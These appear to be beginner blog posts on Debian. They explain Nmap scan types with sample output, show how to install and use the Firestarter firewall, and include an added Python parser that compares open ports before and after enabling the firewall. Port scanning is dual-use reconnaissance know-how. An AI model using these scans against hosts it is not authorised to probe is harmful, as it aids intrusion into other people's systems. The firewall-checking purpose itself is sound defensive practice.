  • Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
  • Free: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
  • Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.
  • Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackers announcement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel on Freenode or EFNet.
  • Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
  • Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.
The information above is taken from the official nmap site (www.nmap.org).

Let the games begin!
First of all open your Terminal, get root privileges and type "apt-get install nmap".
Wait a couple of seconds and then you are ready to dive into nmap!
There are two basic types of scanning with the nmap tool: -sT (TCP connect scanning) and -sS (SYN scanning).
You can run these scans by typing in the Terminal "nmap -sT [target ip]" or "nmap -sS [target ip]".
You can also do a ping scan by typing "nmap -sP [target ip]". By pinging a target you are actually sending an ICMP echo request packet to the target. If an ICMP echo reply is received the target is up, and nmap will print on your terminal that your target is up. If you don't receive an ICMP echo reply, it means that the target is down.
A very useful nmap option is also -sV, which collects information about the service on a port, including the product name and version number. There is also -sA (checks whether a port is filtered or not) and -O (finds the OS of the target).

If you are "allergic" to the terminal and the command line you can use the -iL <file> option. This option allows you to make a file (a txt file) and write into it the IPs of the targets. Then, by typing nmap -iL filename.txt in the terminal, nmap will read the input from the file!

Here are some examples of the well-known nmap commands:

1) -sP (ping scan)
[chaos]# nmap -sP 10.0.0.0/24

Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-07-14 14:19 BST
Host 10.0.0.1 appears to be up.
MAC Address: 00:09:5B:29:FD:96 (Netgear)
Host 10.0.0.2 appears to be up.
MAC Address: 00:0F:B5:96:38:5D (Netgear)
Host 10.0.0.4 appears to be up.
Host 10.0.0.5 appears to be up.
MAC Address: 00:14:2A:B1:1E:2E (Elitegroup Computer System Co.)
Nmap finished: 256 IP addresses (4 hosts up) scanned in 5.399 seconds

2) -A (OS fingerprinting), -sS
[chaos]# nmap -sS -A 10.0.0.1

Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-07-14 14:23 BST
Insufficient responses for TCP sequencing (0), OS detection may be less accurate
Interesting ports on 10.0.0.1:
(The 1671 ports scanned but not shown below are in state: closed)
PORT   STATE SERVICE    VERSION
80/tcp open  tcpwrapped
MAC Address: 00:09:5B:29:FD:96 (Netgear)
Device type: WAP
Running: Compaq embedded, Netgear embedded
OS details: WAP: Compaq iPAQ Connection Point or Netgear MR814

Nmap finished: 1 IP address (1 host up) scanned in 3.533 seconds

Wednesday, April 11, 2012

Tutorial02: Dive into Firestarter


You have just seen in the previous tutorial the, in my opinion, fantastic functions of your new Firewall!
Don't you also think it is time to go deeper? "The well known as dive into firewall!"
All that is left is to navigate the Debian menu by simply pressing Applications>Internet>Firestarter, and you will see Firestarter running.

In Firewall status, at the very top, we can tell whether Firestarter is running normally. Right below it, in Network, we can see which interface we have. Right next to that we can see the packets entering and leaving our computer. Finally, our active connections are shown: the ports in use, the Destinations and of course the Services and the programs that run each service!
Let's look at the other tabs as well!
The Events tab, which is at the top of Firestarter, shows us everything that happens in the network and which operations are considered dangerous and have been blocked by Firestarter. Moreover, if someone attempts to attack you (for example with port scanning), not only will they be unable to run the attack, but Firestarter will also inform you immediately by showing an icon at the top of your screen!
Finally, the Policy tab gives us the ability to "add a rule", for example to open a port, something I would *not* recommend!

Tutorial 01: Setting Up a firewall on Debian, closing all ports

Hello!
For the first tutorial we will talk about how you can install a good
firewall (http://en.wikipedia.org/wiki/Firewall_%28computing%29), which gives you safety on the internet and also closes the open ports on your system! (http://en.wikipedia.org/wiki/Port_%28computer_networking%29)

Prerequisites: Debian Operating System, wireless connection

Step 1) Open the terminal, become root with the su command and enter the password. Then download nmap with the command apt-get install nmap
Your screen will look something like this.


Step 2) Next, type the command ifconfig in the Terminal so that you can see your IP.
Your screen will look something like this, with the possible difference that instead of eth1 you have wlan0. Naturally, you will also have different addresses.
Step 3) Now you must scan for open ports with the following command in the Terminal: nmap -v ip, where in place of ip you put your own IP address, which you learned in the previous step.

Step 4) Open the Terminal and enter the following command
apt-get install firestarter
When the installation finishes, press Applications>Internet>Firestarter and you will be ready.

Finally, do one more scan with nmap using the command nmap -v ip (where ip is your own IP, e.g. 192.168.1.3) and the results are obvious. Almost no port open!
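To make the before/after comparison of Tutorial 01 repeatable, and to work with the Nmap normal output format shown in Tutorial03 above, here is an added Python example (not from this blog or from the Nmap project) that parses that format and lists which open ports disappeared once the firewall was enabled; both scan texts are constructed samples in the Nmap 4.x wording.

```python
import re
from typing import Dict, Set

# Constructed scan outputs in the Nmap 4.x normal-output wording seen in the
# tutorial (not real scans): the same host before and after enabling the firewall.
SCAN_BEFORE = """\
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-07-14 14:23 BST
Host 192.168.1.3 appears to be up.
Interesting ports on 192.168.1.3:
(The 1668 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE
22/tcp   open  ssh
111/tcp  open  rpcbind
631/tcp  open  ipp
Nmap finished: 1 IP address (1 host up) scanned in 0.312 seconds
"""
SCAN_AFTER = """\
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-07-14 14:40 BST
Host 192.168.1.3 appears to be up.
Interesting ports on 192.168.1.3:
(The 1670 ports scanned but not shown below are in state: filtered)
PORT     STATE SERVICE
22/tcp   open  ssh
Nmap finished: 1 IP address (1 host up) scanned in 2.104 seconds
"""
HOST_UP_RE = re.compile(r"^Host (\S+) appears to be up\.")
PORTS_RE = re.compile(r"^Interesting ports on (\S+):")
PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+(\w+)\s+(\S+)")

def hosts_up(report: str) -> Set[str]:
    """Hosts that a ping scan (-sP) reported as up."""
    return {m.group(1) for m in map(HOST_UP_RE.match, report.splitlines()) if m}

def open_ports(report: str) -> Dict[str, Set[str]]:
    """Map each host in a port scan (-sT/-sS) to its set of open port/proto entries."""
    result: Dict[str, Set[str]] = {}
    host = None
    for line in report.splitlines():
        if m := PORTS_RE.match(line):
            host = m.group(1)
            result.setdefault(host, set())
        elif (m := PORT_RE.match(line)) and host and m.group(2) == "open":
            result[host].add(m.group(1))
    return result

def closed_by_firewall(before: str, after: str) -> Dict[str, Set[str]]:
    """Ports that were open before the firewall and are no longer open after it."""
    b, a = open_ports(before), open_ports(after)
    return {h: b[h] - a.get(h, set()) for h in b if b[h] - a.get(h, set())}
```

Feed it the saved text of your two nmap -v scans and closed_by_firewall tells you exactly which ports the new firewall policy hid, so an unexpected port left open stands out immediately.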

Welcome!

Welcome to the brand new 010life blogspot! A blog suitable for anyone who works with computers and anyone who wants to learn through the tutorials, and also to stay informed about various everyday topics! Enjoy it!